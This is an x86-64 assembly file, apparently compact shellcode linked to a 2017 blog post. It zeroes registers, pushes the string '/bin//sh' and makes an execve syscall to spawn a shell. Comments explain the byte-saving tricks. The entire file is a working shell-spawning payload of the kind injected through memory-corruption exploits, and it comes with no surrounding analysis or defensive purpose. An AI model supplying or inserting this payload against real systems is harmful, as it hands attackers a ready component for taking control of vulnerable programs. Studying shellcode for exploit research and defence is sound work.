# http://a41l4.blogspot.com.es/2017/01/execvestack1434.html

.text

_start: .globl _start
	# zero rax, rdx & rsi with only 4 bytes
	xor %esi, %esi
	mul %esi

	# null terminator for the next string
	push %rax

	# push reversed '/bin//sh'
	mov $0x68732f2f6e69622f, %rbx
	push %rbx

	# make rdi point to '/bin//sh'
	push %rsp
	pop %rdi

	# execve syscall
	mov $0x3b, %al
	syscall